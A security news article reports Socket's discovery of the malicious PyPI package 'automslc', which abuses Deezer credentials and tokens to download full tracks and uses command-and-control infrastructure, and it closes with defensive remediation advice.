Cybersecurity researchers at Socket have uncovered a significant security threat in the Python Package Index (PyPI), identifying a malicious package named “automslc” that has accumulated over 100,000 downloads since 2019. The package has been specifically designed to bypass Deezer’s security measures, enabling unauthorized access to protected content on the popular music streaming platform that serves users across 180 countries.
Technical Analysis of the Malicious Package
The investigation reveals that automslc operates through a sophisticated mechanism involving hardcoded credentials for Deezer’s platform. The package establishes authenticated sessions with Deezer’s API, either using these embedded credentials or allowing users to input their own authentication details. This dual-authentication approach demonstrates the attacker’s strategic implementation to maximize the package’s reach and effectiveness.
Once authentication is achieved, the package executes a series of unauthorized operations, including extraction of track metadata and special decryption tokens. Of particular concern is the exploitation of Deezer’s MD5_ORIGIN token, which is crucial for generating secure URLs. The package leverages internal API calls to circumvent Deezer’s standard preview restrictions, enabling full audio file downloads.
Security Implications and Infrastructure Abuse
While the package’s primary function appears to focus on unauthorized music acquisition, Socket’s analysis reveals more concerning security implications. The implementation of a Command and Control (C&C) infrastructure suggests sophisticated operational capabilities that extend beyond simple content piracy. This infrastructure could potentially be leveraged for coordinated cyberattacks or creating distributed attack networks.
Threat Actor Profile and Operational Patterns
The package maintainer, operating under the aliases “hoabt2” and “Thanh Hoa,” demonstrates active engagement in monitoring and coordinating user activities. This behavior pattern indicates a well-organized operation rather than a casual exploit attempt. Security analysts have identified this as a high-risk indicator for potential escalation to more severe forms of cyber attacks.
Any Python project using automslc should treat the installation as a potential compromise — the package’s C&C infrastructure means it may have exfiltrated data or installed backdoors. Teams should audit their pip history (pip show automslc), remove the package immediately, and check for unexpected outbound connections in logs. Going forward, use Socket Security, pip-audit, or Semgrep Supply Chain to automatically scan new dependencies for credential-stealing patterns before they reach production.
